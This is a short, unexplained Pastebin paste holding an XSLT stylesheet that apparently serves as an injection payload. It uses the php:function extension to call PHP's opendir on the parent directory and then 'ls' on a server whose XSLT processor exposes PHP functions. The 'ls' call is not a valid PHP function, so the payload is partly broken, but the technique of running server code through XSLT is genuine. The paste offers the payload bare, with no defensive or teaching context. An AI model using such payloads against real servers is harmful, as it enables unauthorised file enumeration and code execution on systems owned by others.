Advertisement
Guest User

Untitled

a guest
Oct 15th, 2019
68
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.27 KB | None | 0 0
  1. <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
  2. <xsl:template match="/">
  3. <xsl:value-of select="php:function('opendir','..')"/>
  4. <xsl:value-of select="php:function('ls')"/>
  5. </xsl:template>
  6. </xsl:stylesheet>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement